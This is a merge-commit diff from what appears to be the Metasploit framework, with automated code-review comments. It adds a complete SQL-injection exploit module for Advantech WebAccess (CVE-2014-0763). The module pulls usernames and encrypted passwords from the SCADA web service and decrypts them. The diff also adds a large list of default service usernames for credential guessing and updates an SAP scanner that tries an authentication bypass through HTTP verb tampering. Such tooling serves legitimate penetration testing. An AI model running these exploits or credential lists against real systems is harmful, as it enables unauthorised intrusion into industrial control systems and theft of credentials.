
Merge branch 'upstream-master' into staging/electro-release

Samuel Huckins 5 years ago
parent
commit
9e53b795c3

+ 1214
- 0
data/wordlists/default_pass_for_services_unhash.txt


+ 1787
- 0
data/wordlists/default_userpass_for_services_unhash.txt


+ 915
- 0
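--- /dev/null
+++ b/data/wordlists/default_users_for_services_unhash.txt
@@ -0,0 +1,915 @@
+admin
+
+root
+Administrator
+sysadm
+tech
+operator
+guest
+security
+debug
+manager
+service
+!root
+user
+netman
+super
+diag
+Cisco
+Manager
+DTA
+apc
+User
+Admin
+cablecom
+adm
+wradmin
+netscreen
+sa
+setup
+cmaker
+enable
+MICRO
+login
+write
+monitor
+netopia
+op
+adminview
+sysadmin
+echo
+craft
+maint
+comcast
+CSG
+readonly
+manuf
+cusadmin
+smc
+sweex
+disttech
+su
+poll
+SYSDBA
+anonymous
+support
+recovery
+USERID
+eng
+administrator
+NETWORK
+JDE
+Guest
+rwa
+USER
+test
+lp
+ro
+MAIL
+ami
+hsa
+system
+MGR
+ADMINISTRATOR
+FIELD
+PBX
+HELLO
+hscroot
+1502
+superuser
+netrangr
+readwrite
+piranha
+wlse
+l3
+none
+naadmin
+public
+NETOP
+MANAGER
+demo
+D-Link
+l2
+rw
+cgadmin
+storwatch
+vcr
+OPERATOR
+MDaemon
+jagadmin
+enquiry
+at4400
+davox
+PFCUser
+aaa
+topicalt
+admin2
+1234
+nms
+client
+sys
+field
+deskman
+SYSADM
+superadmin
+pmd
+GEN2
+ADMN
+Factory
+PRODDTA
+tellabs
+spcl
+dadmin
+helpdesk
+dhs3mt
+install
+adfexc
+IntraSwitch
+manage
+superman
+SPOOLMAN
+ADVMAIL
+vt100
+PSEAdmin
+patrol
+teacher
+PCUSER
+Any
+RSBCMON
+cellit
+inads
+halt
+locate
+TMAR#HWMT8007079
+rapport
+xbox
+device
+NICONEX
+acc
+31994
+bcim
+websecadm
+blue
+topicnorm
+supervisor
+ccrusr
+266344
+telecom
+GEN1
+SSA
+HTTP
+mtch
+bciim
+browse
+hydrasna
+deskres
+bbsd-client
+replicator
+intel
+radware
+intermec
+mlusr
+init
+e250
+Polycom
+temp1
+mac
+3comcso
+RMUser1
+WP
+NAU
+rcust
+mtcl
+topicres
+bcnas
+adminuser
+Root
+cac_admin
+mediator
+Anonymous
+kermit
+volition
+GlobalAdmin
+LUCENT01
+LUCENT02
+adminstat
+desknorm
+IntraStack
+e500
+deskalt
+cust
+tiara
+bcms
+m1122
+telco
+xd
+dhs3pms
+VNC
+customer
+cisco
+adminstrator
+ftp_nmc
+me
+iclock
+scmadmin
+installer
+webadmin
+ftp_inst
+DDIC
+SYSTEM
+draytek
+EARLYWATCH
+super.super
+ftp_oper
+corecess
+weblogic
+system/manager
+End
+d.e.b.u.g
+target
+MD110
+tiger
+adminttd
+wlseuser
+SAPCPIC
+ftp_admi
+default.password
+7
+2
+ADMIN
+itsadmin
+PUBSUB
+CTXSYS
+ftp
+bill
+192.168.1.1
+setpriv
+GUEST
+SAP*
+t3admin
+hello
+CISCO15
+1.79
+mso
+Telecom
+qsysopr
+APPS
+Developer
+mail
+qsecofr
+11111
+Service
+netadmin
+any
+db2fenc1
+johnson
+isp
+demos
+QSRV
+MDSYS
+vpasp
+TEST
+QSECOFR
+1
+informix
+5
+engmode
+scout
+qpgmr
+ADSL
+images
+Gearguy
+Demo
+serial#
+BACKUP
+stratacom
+6.x
+mary
+COMPANY
+SYS
+DSL
+Jetform
+eagle
+ROUTER
+ods
+siteadmin
+Alphanetworks
+Admin1
+janta
+servlet
+username
+citel
+Replicator
+SYSMAN
+master
+SUPERUSER
+cn=orcladmin
+30
+maintainer
+BRIO_ADMIN
+internal
+CQSCHEMAUSER
+DEV2000_DEMOS
+FSFTASK1
+checkfs
+USER1
+SQLDBA
+HELP
+toor
+qsrvbas
+SYSADMIN
+EZsetup
+BATCH
+STRAT_USER
+primenet
+OEMREP
+USER6
+lynx
+powerdown
+$ALOC$
+password
+VOL-0215
+tomcat
+REP_MANAGER
+WinCCConnect
+ALLIN1
+DIRMAINT
+eqadmin
+QSRVBAS
+AQJAVA
+LASERWRITER
+PERFSTAT
+apcuser
+MBWATCH
+system_admin
+unix
+OWNER
+NETPRIV
+VSEMAINT
+DEMO
+SYMPA
+REP_OWNER
+DCL
+FAX
+ARCHIVIST
+VTAMUSER
+VMTAPE
+basisk
+NetLinx
+OutOfBox
+NETMGR
+DEFAULT
+OAS_PUBLIC
+read
+AP
+MTSSYS
+SYSMAINT
+AUDIOUSER
+Joe
+IDMS
+$SRV
+snake
+ROOT
+PRINTER
+shutdown
+satan
+RDM470
+trouble
+fax
+OP1
+admin@example.com
+HOST
+ADLDEMO
+QS_ADM
+bin
+OPER
+oracle
+jj
+PO7
+www
+joe
+MAINT
+CMSBATCH
+CCC
+role1
+DATAMOVE
+MSHOME
+ISPVM
+crowd­-openid-­server
+user_editor
+sedacm
+db2admin
+Airaya
+SYSDUMP1
+IMEDIA
+primos_cs
+USER_TEMPLATE
+pnadmin
+lpadmin
+VTAM
+TRACESVR
+POSTMASTER
+MAILER
+RSCSV2
+QS_WS
+circ
+nobody
+Tasman
+DISCOVERER_ADMIN
+VMASMON
+LR-ISDN
+TURBINE
+GL
+PO
+PRINT
+MODTEST
+GATEWAY
+PRIMARY
+both
+haasadm
+pw
+games
+DOCSIS_APP
+bbs
+EMP
+postmaster
+SITEMINDER
+vgnadmin
+RJE
+gonzo
+NEWS
+AQUSER
+UTLBSTATU
+netbotz
+xmi_demo
+ORACACHE
+MCUser
+prash
+sync
+PM
+AP2SVP
+ibm
+ULTIMATE
+SABRE
+user_pricer
+SUPERVISOR
+EVENT
+PORTAL30_SSO_PS
+FSFADMIN
+OO
+WKSYS
+OPERATNS
+UVPIM_
+OE
+OCITEST
+web
+ESSEX
+None
+CTXDEMO
+user_designer
+QDBA
+role
+LRISDN
+tele
+WEBCAL01
+rsadmin
+OMWB_EMULATION
+WINDOWS_PASSTHRU
+MOREAU
+fast
+host
+ORDPLUGINS
+SYSWRM
+savelogs
+SDOS_ICSAP
+DSSYS
+MGWUSER
+TDOS_ICSAP
+ssp
+EJSADMIN
+INGRES
+DS
+estheralastruey
+VCSRV
+ssladmin
+CLARK
+OEMADM
+restoreonly
+quser
+MILLER
+trmcnfg
+REPORT
+user_author
+dpn
+tour
+mountfsys
+http
+PROG
+openfiler
+RAID
+STARTER
+FAXUSER
+DSA
+daemon
+mountsys
+backuponly
+IVPM1
+USER3
+OPENSPIRIT
+prime
+HPLASER
+CSPUSER
+qsvr
+SYSCKP
+Sysop
+user_marketer
+IMAGEUSER
+bsxuser
+MASTER
+USER9
+OLAPSYS
+rje
+ODM_MTR
+QS_ES
+lansweeperuser
+DEMO3
+Username
+GPLD
+uucp
+DBSNMP
+VMARCH
+SWUSER
+Operator
+CHEY_ARCHSVR
+roo
+n.a
+accounting
+backuprestore
+dni
+WEBADM
+iceman
+guru
+anon
+USER8
+PORTAL30_SSO_PUBLIC
+postgres
+WINSABRE
+USERP
+IVPM2
+PORTAL30_SSO
+ALLIN1MAIL
+POST
+TEMP
+BATCH1
+PROMAIL
+SECDEMO
+ARAdmin
+sadmin
+ORAREGSYS
+VMASSYS
+man
+FROSTY
+LASER
+tutor
+DISKCNT
+default
+SYSERR
+WWW
+VAX
+PROCAL
+FAXWORKS
+LDAP_Anonymous
+(any
+setup/snmp
+DSGATEWAY
+AWARD_SW
+CSMIG
+umountfsys
+VMS
+bpel
+viewuser
+TDISK
+politically
+user_analyst
+RSCS
+COMPIERE
+OSP22
+guest1
+FORSE
+factory
+bubba
+QUSER
+primeos
+glftpd
+RMAN
+mountfs
+DIRECT
+firstsite
+IPFSERV
+TSUSER
+BATCH2
+snmp
+WebAdmin
+IBMUSER
+SMART
+voadmin
+BC4J
+core
+OPERVAX
+Bobo
+WANGTEK
+OWA
+USER2
+jasperadmin
+VMBSYSAD
+PVM
+ctb_admin
+ 
+DEMO4
+qsrv
+superdba
+PORTAL30
+XPRT
+Crowd
+18364
+ilom-admin
+rdc123
+sysopr
+tasman
+blank
+WEBREAD
+ODM
+11111111
+AURORA$ORB$UNAUTHENTICATED
+ADAMS
+Craft
+rfmngr
+SYSTEST_CLIG
+user_approver
+ilom-operator
+Nice-admin
+answer
+NETNONPRIV
+nuucp
+CIDS
+VASTEST
+redline
+MBMANAGER
+webmaster
+APPLSYS
+USER4
+hqadmin
+UOMNI_
+VMUTIL
+uucpadm
+EXFSYS
+4Dgifts
+JMUSER
+CIS
+UNITY_
+HLW
+pwrchute
+IDMSSE
+NSA
+TELEDEMO
+recover
+TRAVEL
+lexar
+viewer
+LIBRARY
+PO8
+root@localhost
+NAMES
+secofr
+PDMREMI
+MGE
+USER7
+OWA_PUBLIC
+questra
+builtin
+SFCNTRL
+boss
+PLEX
+OLAPDBA
+OLAPSVR
+user_expert
+Bhosda
+gropher
+TAHITI
+NEWINGRES
+VM3812
+VIF_DEVELOPER
+joeuser
+IPC
+HELPDESK
+wlpisystem
+TSAFVM
+prtgadmin
+UAMIS_
+theman
+CISINFO
+mobile
+QS_CB
+CDEMORID
+DEMO2
+PORTAL30_PUBLIC
+MDDEMO_CLERK
+PHANTOM
+ODS
+BLAKE
+TSDEV
+PRODBM
+dos
+APL2PP
+god1
+CICSUSER
+22222222
+user_publisher
+OSE$HTTP$ADMIN
+def
+SuperUser
+QS_CBADM
+SYSA
+STUDENT
+Draytek
+SMDR
+EREP
+VSEMAN
+fwadmin
+MTS_USER
+AQDEMO
+private
+IS_$hostname
+HPSupport
+ORASSO
+CVIEW
+SH
+XXSESS_MGRYY
+VMMAP
+PORTAL30_DEMO
+Ezsetup
+QS_CS
+CMSUSER
+DEMO1
+userNotUsed
+ncadmin
+TESTPILOT
+fg_sysadmin
+UETP
+QS
+DBI
+JWARD
+APPS_MRC
+Moe
+SENTINEL
+Yak
+PDP11
+Flo
+SLIDE
+INFO
+checkfsys
+PRODCICS
+MXAGENT
+VMTLIBR
+POWERCARTUSER
+VMBACKUP
+CPNUC
+distrib
+MIGRATE
+CDEMOUCB
+OLTSEP
+sysbin
+signa
+autocad
+WEBDB
+ncrm
+SAMPLE
+HCPARK
+ALLINONE
+nm2user
+SAVSYS
+IIPS
+PATROL
+mailadmin
+TMSADM
+ESubscriber
+software
+god2
+FSFTASK2
+ORDSYS
+gopher
+PSFMAINT
+EAdmin
+12345
+DECNET
+OPERATIONS
+$system
+PANAMA
+LIBRARIAN
+fal
+NETSERVER
+POWERCHUTE
+USER5
+GPFD
+QS_OS
+REPADMIN
+0
+DEMO8
+DEMO9
+CDEMO82
+umountsys
+USER0
+CDEMOCOR
+SYSTEST
+Rodopi
+user_checker
+qserv
+AQ
+SAPR3
+VRR1
+fastwire
+admi
+FINANCE
+WinCCAdmin
+ESTOREUSER
+VIRUSER
+LINK
+APPLSYSPUB
+overseer
+checksys
+umountfs
+DBDCCICS
+TOAD
+ntpupdate
+MDDEMO_MGR
+billy-bob
+DECMAIL
+alien
+nsroot
+AdvWebadmin
+dvstation
+SERVICECONSUMER1
+MMO2
+NOC
+WWWUSER
+SAP
+NEVIEW
+ODSCOMMON
+pixadmin
+ripeop
+PENG
+netlink
+L2LDEMO
+OUTLN
+12.x
+scott
+dbase
+fam
+Oper
+RMAIL
+FND
+PRIV
+SETUP
+news
+VSEIPO
+ilon
+PLSQL
+politcally
+18140815
+APPUSER
+CENTRA
+LBACSYS
+PDP8
+SFCMI
+lpadm
+Test
+bewan
+DIP
+mfd
+MDDEMO
+SWPRO
+DES
+Coco
+GCS
+rodopi
+Scott
+Admin5
+ANDY
+DESQUETOP
+NETCON
+JONES
+author
+MOESERV
+PUBSUB1
+CATALOG
+SQLUSER
+RE
+REPORTS_USER
+MFG
+HR
+VIDEOUSER
+DBA
+AUTOLOG1
+AURORA$JIS$UTILITY$
+wlcsystem
+CPRM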

+ 1
- 1
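--- a/lib/rex/proto/http/client.rb
+++ b/lib/rex/proto/http/client.rb
@@ -480,7 +480,7 @@ class Client
     opts['headers']||= {}
 
     ntlmssp_flags = ::Rex::Proto::NTLM::Utils.make_ntlm_flags(ntlm_options)
-    workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
+    workstation_name = Rex::Text.rand_text_alpha(rand(8)+6)
     domain_name = self.config['domain']
 
     b64_blob = Rex::Text::encode_base64(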
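Review bot: The new lower bound at line 483 (`rand(8)+6`, so a 6–13 character workstation name where it used to be 1–8) is not explained anywhere in the hunk, and a bare magic number in an NTLM blob builder is exactly the kind of change a later cleanup reverts. A one-line comment recording the constraint it satisfies would keep the intent, e.g. `# workstation name 6..13 chars; presumably very short names were rejected by some servers — confirm and record why`, with the real reason filled in. Writing the range as `Rex::Text.rand_text_alpha(rand(6..13))` would also make the bounds readable without arithmetic. The enclosing method starts and ends outside the hunk.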

+ 299
- 0
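--- /dev/null
+++ b/modules/auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb
@@ -0,0 +1,299 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include REXML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Advantech WebAccess SQL Injection',
+      'Description'    => %q{
+        This module exploits a SQL injection vulnerability found in Advantech WebAccess 7.1. The
+        vulnerability exists in the DBVisitor.dll component, and can be abused through malicious
+        requests to the ChartThemeConfig web service. This module can be used to extract the site
+        and project usernames and hashes.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2014-0763' ],
+          [ 'ZDI', '14-077' ],
+          [ 'OSVDB', '105572' ],
+          [ 'BID', '66740' ],
+          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-14-079-03' ]
+        ],
+      'Author'         =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Apr 08 2014"
+    ))
+
+    register_options(
+      [
+        OptString.new("TARGETURI", [true, 'The path to the BEMS Web Site', '/BEMS']),
+        OptString.new("WEB_DATABASE", [true, 'The path to the bwCfg.mdb database in the target', "C:\\WebAccess\\Node\\config\\bwCfg.mdb"])
+      ], self.class)
+  end
+
+  def build_soap(injection)
+    xml = Document.new
+    xml.add_element(
+        "s:Envelope",
+        {
+            'xmlns:s' => "http://schemas.xmlsoap.org/soap/envelope/"
+        })
+    xml.root.add_element("s:Body")
+    body = xml.root.elements[1]
+    body.add_element(
+        "GetThemeNameList",
+        {
+            'xmlns' => "http://tempuri.org/"
+        })
+    name_list = body.elements[1]
+    name_list.add_element("userName")
+    name_list.elements['userName'].text = injection
+
+    xml.to_s
+  end
+
+  def do_sqli(injection, mark)
+    xml = build_soap(injection)
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path.to_s, "Services", "ChartThemeConfig.svc"),
+      'ctype'    => 'text/xml; charset=UTF-8',
+      'headers'  => {
+          'SOAPAction' => '"http://tempuri.org/IChartThemeConfig/GetThemeNameList"'
+      },
+      'data'      => xml
+    })
+
+    unless res && res.code == 200 && res.body && res.body.include?(mark)
+      return nil
+    end
+
+    res.body.to_s
+  end
+
+  def check
+    mark = Rex::Text.rand_text_alpha(8 + rand(5))
+    injection =  "#{Rex::Text.rand_text_alpha(8 + rand(5))}' "
+    injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}"
+    data = do_sqli(injection, mark)
+
+    if data.nil?
+      return Msf::Exploit::CheckCode::Safe
+    end
+
+    Msf::Exploit::CheckCode::Vulnerable
+  end
+
+  def parse_users(xml, mark, separator)
+    doc = Document.new(xml)
+
+    strings = XPath.match(doc, "s:Envelope/s:Body/GetThemeNameListResponse/GetThemeNameListResult/a:string").map(&:text)
+    strings_length = strings.length
+
+    unless strings_length > 1
+      return
+    end
+
+    i = 0
+    strings.each do |result|
+      next if result == mark
+      @users << result.split(separator)
+      i = i + 1
+    end
+
+  end
+
+  def run
+    print_status("#{peer} - Exploiting sqli to extract users information...")
+    mark = Rex::Text.rand_text_alpha(8 + rand(5))
+    rand = Rex::Text.rand_text_numeric(2)
+    separator = Rex::Text.rand_text_alpha(5 + rand(5))
+    # While installing I can only configure an Access backend, but
+    # according to documentation other backends are supported. This
+    # injection should be compatible, hopefully, with most backends.
+    injection =  "#{Rex::Text.rand_text_alpha(8 + rand(5))}' "
+    injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}BAUser' from BAUser where #{rand}=#{rand} "
+    injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pUserPassword' from pUserPassword IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} "
+    injection << "union all select UserName + '#{separator}' + Password + '#{separator}' + Password2 + '#{separator}pAdmin' from pAdmin IN '#{datastore['WEB_DATABASE']}' where #{rand}=#{rand} "
+    injection << "union all select '#{mark}' from BAThemeSetting where '#{Rex::Text.rand_text_alpha(2)}'='#{Rex::Text.rand_text_alpha(3)}"
+    data = do_sqli(injection, mark)
+
+    if data.blank?
+      print_error("#{peer} - Error exploiting sqli")
+      return
+    end
+
+    @users = []
+    @plain_passwords = []
+
+    print_status("#{peer} - Parsing extracted data...")
+    parse_users(data, mark, separator)
+
+    if @users.empty?
+      print_error("#{peer} - Users not found")
+      return
+    else
+      print_good("#{peer} - #{@users.length} users found!")
+    end
+
+    users_table = Rex::Ui::Text::Table.new(
+      'Header'  => 'Advantech WebAccess Users',
+      'Ident'   => 1,
+      'Columns' => ['Username', 'Encrypted Password', 'Key', 'Recovered password', 'Origin']
+    )
+
+    for i in 0..@users.length - 1
+      @plain_passwords[i] =
+          begin
+            decrypt_password(@users[i][1], @users[i][2])
+          rescue
+            "(format not recognized)"
+          end
+
+      @plain_passwords[i] = "(blank password)" if @plain_passwords[i].empty?
+
+      begin
+        @plain_passwords[i].encode("ISO-8859-1").to_s
+      rescue Encoding::UndefinedConversionError
+        chars = @plain_passwords[i].unpack("C*")
+        @plain_passwords[i] = "0x#{chars.collect {|c| c.to_s(16)}.join(", 0x")}"
+        @plain_passwords[i] << " (ISO-8859-1 hex chars)"
+      end
+
+      report_auth_info({
+       :host => rhost,
+       :port => rport,
+       :user => @users[i][0],
+       :pass => @plain_passwords[i],
+       :type => "password",
+       :sname => (ssl ? "https" : "http"),
+       :proof => "Leaked encrypted password from #{@users[i][3]}: #{@users[i][1]}:#{@users[i][2]}"
+      })
+
+      users_table << [@users[i][0], @users[i][1], @users[i][2], @plain_passwords[i], user_type(@users[i][3])]
+    end
+
+    print_line(users_table.to_s)
+  end
+
+  def user_type(database)
+    user_type = database
+
+    unless database == "BAUser"
+      user_type << " (Web Access)"
+    end
+
+    user_type
+  end
+
+  def decrypt_password(password, key)
+    recovered_password = recover_password(password)
+    recovered_key = recover_key(key)
+
+    recovered_bytes = decrypt_bytes(recovered_password, recovered_key)
+    password = []
+
+    recovered_bytes.each { |b|
+      if b == 0
+        break
+      else
+        password.push(b)
+      end
+    }
+
+    return password.pack("C*")
+  end
+
+  def recover_password(password)
+    bytes = password.unpack("C*")
+    recovered = []
+
+    i = 0
+    j = 0
+    while i < 16
+      low = bytes[i]
+      if low < 0x41
+        low = low - 0x30
+      else
+        low = low - 0x37
+      end
+      low = low * 16
+
+      high = bytes[i+1]
+      if high < 0x41
+        high = high - 0x30
+      else
+        high = high - 0x37
+      end
+
+      recovered_byte = low + high
+      recovered[j] = recovered_byte
+      i = i + 2
+      j = j + 1
+    end
+
+    recovered
+  end
+
+  def recover_key(key)
+    bytes = key.unpack("C*")
+    recovered = 0
+
+    bytes[0, 8].each { |b|
+      recovered = recovered * 16
+      if b < 0x41
+        byte_weight = b - 0x30
+      else
+        byte_weight = b - 0x37
+      end
+      recovered = recovered + byte_weight
+    }
+
+    recovered
+  end
+
+  def decrypt_bytes(bytes, key)
+    result = []
+    xor_table = [0xaa, 0xa5, 0x5a, 0x55]
+    key_copy = key
+    for i in 0..7
+      byte = (crazy(bytes[i] ,8 - (key & 7)) & 0xff)
+      result.push(byte ^ xor_table[key_copy & 3])
+      key_copy = key_copy / 4
+      key = key / 8
+    end
+
+    result
+  end
+
+  def crazy(byte, magic)
+    result = byte & 0xff
+
+    while magic > 0
+      result = result * 2
+        if result & 0x100 == 0x100
+          result = result + 1
+        end
+        magic = magic - 1
+    end
+
+    result
+  end
+
+end
+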
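Review bot: `user_type` appends to its argument in place at line 198 (`user_type << " (Web Access)"`), so after the call at line 188 the string in `@users[i][3]` itself carries the suffix; today the `:proof` string at line 185 is built before that call, so nothing visible breaks, but a helper should not mutate caller data — `user_type = database.dup` on line 195, or simply `return "#{database} (Web Access)"`. Two smaller points: the counter `i` in `parse_users` (lines 112–116) is incremented but never read and can be dropped, and `rand = Rex::Text.rand_text_numeric(2)` at line 124 shadows `Kernel#rand`, which lines 125 and 129 still call as `rand(5)` — Ruby parses that as a method call because of the argument, but a name such as `rand_num` would spare the reader the double take. The discarded result of `.encode("ISO-8859-1")` at line 171 reads like a mistake; a comment such as `# probe only: raises UndefinedConversionError when the recovered bytes are not ISO-8859-1` would make the intent explicit.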

+ 93
- 56
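--- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
+++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rex/proto/http'
 require 'msf/core'
 
 class Metasploit3 < Msf::Auxiliary
@@ -30,62 +29,43 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         OptString.new('VERB',    [true, "Verb for auth bypass testing", "HEAD"]),
-        OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
+        OptPath.new('URLFILE', [true, "SAP ICM Paths File",
+          File.join(Msf::Config.data_directory, 'wordlists', 'sap_icm_paths.txt')])
       ], self.class)
   end
 
   # Base Structure of module borrowed from jboss_vulnscan
   def run_host(ip)
-    # If URLFILE is set empty, obviously the user made a silly mistake
-    if datastore['URLFILE'].empty?
-      print_error("Please specify a URLFILE")
-      return
-    end
-
-    # Initialize the actual URLFILE path
-    if datastore['URLFILE'] == "sap_icm_paths.txt"
-      url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
-    else
-      # Not the default sap_icm_paths file
-      url_file = datastore['URLFILE']
-    end
-
-    # If URLFILE path doesn't exist, no point to continue the rest of the script
-    if not File.exists?(url_file)
-      print_error("Required URL list #{url_file} was not found")
-      return
-    end
-
-    res = send_request_cgi(
+     res = send_request_cgi(
       {
         'uri'       => "/" + Rex::Text.rand_text_alpha(12),
         'method'    => 'GET',
-        'ctype'     => 'text/plain',
-      }, 20)
+      })
 
     if res
       print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
       @info = []
-      if not res.headers['Server'].nil?
+      if res.headers['Server']
         @info << res.headers['Server']
         print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
       else
         print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
       end
 
-      if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
+      if (res.body && /class="note">(.*)code:(.*)</i.match(res.body) )
         print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
       end
 
       # Load URLs
-      urls_to_check = []
-      File.open(url_file) do |f|
+      urls_to_check = check_urlprefixes
+      File.open(datastore['URLFILE']) do |f|
         f.each_line do |line|
           urls_to_check.push line
         end
       end
 
       print_status("#{rhost}:#{rport} Beginning URL check")
+      @valid_urls = ''
       urls_to_check.each do |url|
         check_url(url.strip)
       end
@@ -93,59 +73,116 @@ class Metasploit3 < Msf::Auxiliary
       print_error("#{rhost}:#{rport} No response received")
     end
 
+    if @valid_urls.length > 0
+      l = store_loot(
+        'sap.icm.urls',
+        "text/plain",
+        datastore['RHOST'],
+        @valid_urls,
+        "icm_urls.txt", "SAP ICM Urls"
+      )
+      print_line
+      print_good("Stored urls as loot: #{l}") if l
+    end
   end
 
   def check_url(url)
+    full_url = write_url(url)
     res = send_request_cgi({
-      'uri'       => url,
+      'uri'       => normalize_uri(url),
       'method'    => 'GET',
-      'ctype'     => 'text/plain',
-    }, 20)
+    })
 
     if (res)
-      if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
-        print_good("New server header seen [#{res.headers['Server']}]")
-        @info << res.headers['Server'] #Add To seen server headers
+      if res.headers['Server']
+        unless @info.include?(res.headers['Server'])
+          print_good("New server header seen [#{res.headers['Server']}]")
+          @info << res.headers['Server'] #Add To seen server headers
+        end
       end
 
-      case
-      when res.code == 200
-        print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)")
-      when res.code == 403
-        print_good("#{rhost}:#{rport} #{url} - restricted (403)")
-      when res.code == 401
-        print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
+      case res.code
+      when 200
+        print_good("#{full_url} - does not require authentication (#{res.code}) (length: #{res.headers['Content-Length']})")
+        @valid_urls << full_url << "\n"
+      when 403
+        print_status("#{full_url} - restricted (#{res.code})")
+      when 401
+        print_status("#{full_url} - requires authentication (#{res.code}): #{res.headers['WWW-Authenticate']}")
+        @valid_urls << full_url << "\n"
         # Attempt verb tampering bypass
         bypass_auth(url)
-      when res.code == 404
+      when 404
         # Do not return by default, only display in verbose mode
-        vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
-      when res.code == 500
-        print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
-      when res.code == 301, res.code == 302
-        print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
+        vprint_status("#{full_url} - not found (#{res.code})")
+      when 400, 500
+        print_status("#{full_url} - produced a server error (#{res.code})")
+      when 301, 302
+        print_good("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
+        @valid_urls << full_url << "\n"
+      when 307
+        print_status("#{full_url} - redirected (#{res.code}) to #{res.redirection} (not following)")
       else
-        vprint_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
+        print_error("#{full_url} - unhandled response code #{res.code}")
+        @valid_urls << full_url << "\n"
       end
 
     else
-      print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)")
+      vprint_status("#{full_url} - not found (No Repsonse code Received)")
     end
   end
 
+  def write_url(path)
+    if datastore['SSL']
+      protocol = 'https://'
+    else
+      protocol = 'http://'
+    end
+
+    "#{protocol}#{rhost}:#{rport}#{path}"
+  end
+
   def bypass_auth(url)
-    print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
+    full_url = write_url(url)
+    vprint_status("#{full_url} Check for verb tampering (#{datastore['VERB']})")
 
     res = send_request_raw({
-      'uri'       => url,
+      'uri'       => normalize_uri(url),
       'method'    => datastore['VERB'],
       'version'   => '1.0' # 1.1 makes the head request wait on timeout for some reason
-    }, 20)
+    })
 
-    if (res and res.code == 200)
-      print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering")
+    if (res && res.code == 200)
+      print_good("#{full_url} Got authentication bypass via HTTP verb tampering")
     else
-      print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
+      vprint_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
     end
   end
+
+  # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS.
+  # This is how the message server finds out which URLs must be forwarded where.
+  #  (SAP help) -> this disclose custom URLs that are also checked for authentication
+  def check_urlprefixes
+    urls = []
+    res = send_request_cgi({
+      'uri'       => "/sap/public/icf_info/urlprefix",
+      'method'    => 'GET',
+    })
+
+    if (res && res.code == 200)
+      res.body.each_line do |line|
+        if line =~ /PREFIX=/
+          url_enc = line.sub(/^PREFIX=/, '')
+          # Remove CASE and VHOST
+          url_enc = url_enc.sub(/&CASE=.*/, '')
+          url_dec = URI.unescape(url_enc).sub(/;/, '')
+          urls << url_dec.strip
+        end
+      end
+    else
+      print_error("#{rhost}:#{rport} Could not retrieve urlprefixes")
+    end
+
+    urls
+  end
 end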
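Review bot: `@valid_urls` is only initialised at line 68, inside the `if res` branch of `run_host`, but line 76 calls `@valid_urls.length` after that `if`/`else` has closed, so a host that never answers the probe (the `print_error` path at line 73) raises `NoMethodError` on `nil` — unless the variable is set somewhere the hunks do not show, such as `initialize`. Moving `@valid_urls = ''` to the top of `run_host`, before the first `send_request_cgi`, fixes it; `if @valid_urls && !@valid_urls.empty?` is the defensive alternative. Two smaller points in the same section: `store_loot` at line 80 passes `datastore['RHOST']` although the method already receives the per-host `ip` argument — the scanner mixin presumably sets RHOST per host, but `ip` says what is meant — and `URI.unescape` at line 178 is an obsolete API, with `URI.decode_www_form_component` or `CGI.unescape` as the supported replacements. The re-added `res = send_request_cgi(` at line 39 is also indented one space deeper than the surrounding body.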

+ 2
- 2
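--- a/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
+++ b/modules/auxiliary/scanner/snmp/brocade_enumhash.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
           row.each { |val| @hashes << val.value.to_s }
         end
 
-        print_good("#{ip} Found Users & Password Hashes:")
+        print_good("#{ip} - Found user and password hashes:")
         end
 
         credinfo = ""
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
      rescue ::Interrupt
        raise $!
      rescue ::Exception => e
-       print_error("#{ip} error: #{e.class} #{e}")
+       print_error("#{ip} - Error: #{e.class} #{e}")
      disconnect_snmp
      end
   end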

+ 1
- 1
